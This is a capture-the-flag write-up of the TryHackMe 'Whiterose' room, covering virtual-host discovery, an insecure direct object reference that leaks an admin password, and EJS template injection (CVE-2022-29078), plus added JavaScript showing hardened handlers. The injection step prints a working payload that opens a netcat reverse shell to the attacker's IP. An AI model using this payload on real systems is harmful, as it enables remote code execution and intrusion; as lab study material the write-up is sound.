THM-Whiterose

This post was last updated on the evening of 19 March 2025.

Left unfinished...

What’s Tyrell Wellick’s phone number?

```
└─# nmap -sS -sV -Pn -A 10.10.218.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 14:58 CST
Nmap scan report for 10.10.218.118
Host is up (0.39s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
|   256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_  256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Aggressive OS guesses: Linux 3.1 (91%), Linux 3.2 (91%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), Linux 2.6.32 (90%), Linux 3.1 - 3.2 (90%), Linux 3.2 - 4.9 (90%), Linux 3.7 - 3.10 (90%), Linux 5.0 - 5.5 (90%), QNAP QTS 4.0 - 4.2 (90%), ASUS RT-N56U WAP (Linux 3.4) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   0.34 ms   172.30.144.1
2   389.62 ms 10.21.0.1
3   390.09 ms 10.10.218.118

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.53 seconds
```

Ports 80 and 22 are open.

Visiting the web page shows nothing at all.

Use ffuf to check for subdomains (virtual hosts):

```
└─# ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cyprusbank.thm/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.cyprusbank.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

www   [Status: 200, Size: 252, Words: 19, Lines: 9, Duration: 447ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 447ms]
:: Progress: [4989/4989] :: Job [1/1] :: 89 req/sec :: Duration: [0:00:56] :: Errors: 0 :
```

Two virtual hosts turn up:

```
www.cyprusbank.thm
admin.cyprusbank.thm
```

The admin.cyprusbank.thm site has a login page; log in with the credentials the room provides:

```
Olivia Cortez:olivi8
```

Some account information is visible, but not the details. The Message page shows a few messages, and its URL carries a parameter of the form ?c=5. Changing that value to walk through other pages, ?c=0 returns the administrator's account credentials:

```
Gayle Bev:p~]P@5!6;rs558:q
```

Logging in with that account exposes the full account details:

```
Tyrell Wellick:842-029-5701
```
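The ?c=0 step above is an insecure direct object reference: the Message page looks a thread up by the id in the query string without checking that the logged-in user owns it. The following is an added example (not code from the room or from this write-up) that contrasts that lookup with one scoped to the requesting user. The thread store, user ids and message text are constructed for the example.

```javascript
// Added example, not from the original write-up or the TryHackMe room.
// Constructed data model: message threads keyed by the integer that the
// "c" query parameter carries; thread 0 belongs to the admin user.
const threads = new Map([
  [0, { ownerId: 'admin', messages: ['constructed admin-only message'] }],
  [5, { ownerId: 'olivia', messages: ['constructed user message'] }],
]);

// Parse "c" strictly: only a short run of digits is accepted, so values such
// as "-1", "0x0" or "5 OR 1=1" are rejected before any lookup happens.
function parseThreadId(raw) {
  if (typeof raw !== 'string' || !/^\d{1,9}$/.test(raw)) return null;
  return Number(raw);
}

// Vulnerable shape (the behaviour seen on the Message page): the thread is
// fetched by id alone, so any authenticated user can enumerate every id.
function getThreadNoAuthz(rawId) {
  const id = parseThreadId(rawId);
  if (id === null) return { status: 400 };
  const t = threads.get(id);
  return t ? { status: 200, messages: t.messages } : { status: 404 };
}

// Hardened shape: the lookup is scoped to the requesting user. A thread that
// exists but belongs to someone else is answered with 404 rather than 403, so
// the response does not confirm which ids are valid.
function getThread(rawId, user) {
  const id = parseThreadId(rawId);
  if (id === null) return { status: 400 };
  const t = threads.get(id);
  if (!t || t.ownerId !== user.id) return { status: 404 };
  return { status: 200, messages: t.messages };
}

// Stand-alone demonstration: the same request by the same user gives
// different results under the two handlers.
console.log('no authz, c=0 as olivia:', getThreadNoAuthz('0'));
console.log('authz,    c=0 as olivia:', getThread('0', { id: 'olivia' }));
console.log('authz,    c=5 as olivia:', getThread('5', { id: 'olivia' }));
```

The same ownership check belongs on every endpoint that takes an object id, including the Settings page that later changes a user's password; a per-route check is what makes a sequential id harmless.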

What is the user.txt flag?

The Settings page lets you change a user's account name and password.

Intercept the request with Burp Suite (Bp): after the password field is modified, the response echoes an error.

It is an ejs error. Searching for it online turns up CVE-2022-29078, a template injection in the EJS template engine that leads to RCE:

```
name=admin&password=111&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('busybox nc 10.21.118.213 1234 -e bash');s
```

Start a listener and the shell that connects back yields the flag:

```
THM{4lways_upd4te_uR_d3p3nd3nc!3s}
```
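The payload above works because the application hands the whole parsed form body to the template engine, so bracket-notation keys such as settings[view options][outputFunctionName] end up as EJS render options instead of plain form fields. The following is an added example (not code from the room or from this write-up) showing, without pulling in Express or EJS, how an extended-urlencoded body turns into that nested object, why spreading it into the render locals is dangerous, and what the allowlisted alternative looks like. The request body is constructed to mirror the shape of the payload above with the command part replaced by a placeholder; the parser is a minimal stand-in for the extended "qs" parsing that Express performs and is an assumption of this example. Updating EJS, as the flag text suggests, is the other half of the fix.

```javascript
// Added example, not from the original write-up or the TryHackMe room.

// Minimal stand-in for extended urlencoded parsing: "a[b][c]=v" becomes
// { a: { b: { c: 'v' } } }. Objects are created with a null prototype so a
// key such as "__proto__" becomes an ordinary own property.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch { return s; }
}

function parseBracketForm(body) {
  const out = Object.create(null);
  for (const pair of body.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = safeDecode(eq < 0 ? pair : pair.slice(0, eq));
    const value = eq < 0 ? '' : safeDecode(pair.slice(eq + 1));
    const m = key.match(/^([^\[]+)((?:\[[^\]]*\])*)$/);
    if (!m) continue;
    const parts = [m[1]];
    for (const seg of m[2].matchAll(/\[([^\]]*)\]/g)) parts.push(seg[1]);
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      if (typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) {
        cur[parts[i]] = Object.create(null);
      }
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Vulnerable shape: everything the client sent becomes a render local, so a
// "settings" object (with its "view options") reaches the template engine.
function buildRenderLocalsUnsafe(parsed) {
  return { ...parsed };
}

// Hardened shape: only the fields the Settings form legitimately carries are
// copied, and only when they are strings. Nothing else can reach the engine.
const ALLOWED_FIELDS = ['name', 'password'];
function buildRenderLocals(parsed) {
  const locals = {};
  for (const k of ALLOWED_FIELDS) {
    if (typeof parsed[k] === 'string') locals[k] = parsed[k];
  }
  return locals;
}

// Detection aid: a browser form never submits a "settings[view options]"
// object, so its presence in a request body is a reliable signal of an
// attempt to override EJS options such as outputFunctionName.
function hasViewOptionsOverride(parsed) {
  const s = parsed.settings;
  return typeof s === 'object' && s !== null && 'view options' in s;
}

// Constructed request body in the shape of the write-up's payload; the command
// part is replaced by a placeholder.
const CONSTRUCTED_BODY =
  'name=admin&password=111&settings[view options][outputFunctionName]=x;CONSTRUCTED_PAYLOAD';

const parsed = parseBracketForm(CONSTRUCTED_BODY);
console.log('unsafe locals keys:', Object.keys(buildRenderLocalsUnsafe(parsed)));
console.log('safe locals keys:  ', Object.keys(buildRenderLocals(parsed)));
console.log('override detected: ', hasViewOptionsOverride(parsed));
```

The allowlist approach also closes the door on any future render option that might become injectable, which is why it is preferable to blocklisting outputFunctionName alone.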

What is the root.txt flag?

```
sudo -l
Matching Defaults entries for web on cyprusbank:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User web may run the following commands on cyprusbank:
    (root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
```

sudoedit can be used to escalate privileges through sudo. I couldn't get the write to the file to go through afterwards, ugh...


Author: butt3rf1y
Published: 19 March 2025
http://example.com/2025/03/19/THM-Whiterose/